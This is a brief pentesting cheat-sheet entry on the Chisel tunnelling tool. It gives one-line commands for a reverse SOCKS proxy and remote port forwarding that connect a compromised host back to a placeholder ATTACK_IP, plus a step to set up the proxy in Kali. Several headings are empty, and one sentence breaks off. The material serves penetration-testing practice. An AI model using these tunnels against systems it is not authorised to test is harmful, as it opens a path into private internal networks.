Chisel
Chisel client/server --help
Author: https://github.com/jpillora/chisel/releases
Reverse SOCKS proxy
./chisel server -p LISTENING_PORT --reverse &./chisel client ATTACK_IP:LISTEN_PORT R:0.0.0.0:1080:SOCKS &./chisel client ATTACK_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT./chisel server -p TARGET_PORT --socks5
Then open the web browser in Kali and configure the proxy settings.
Forward SOCKS proxy
TIP
Local Port Forward
Remote Port Forward
Then on our machine, we browse to
TIP
Last updated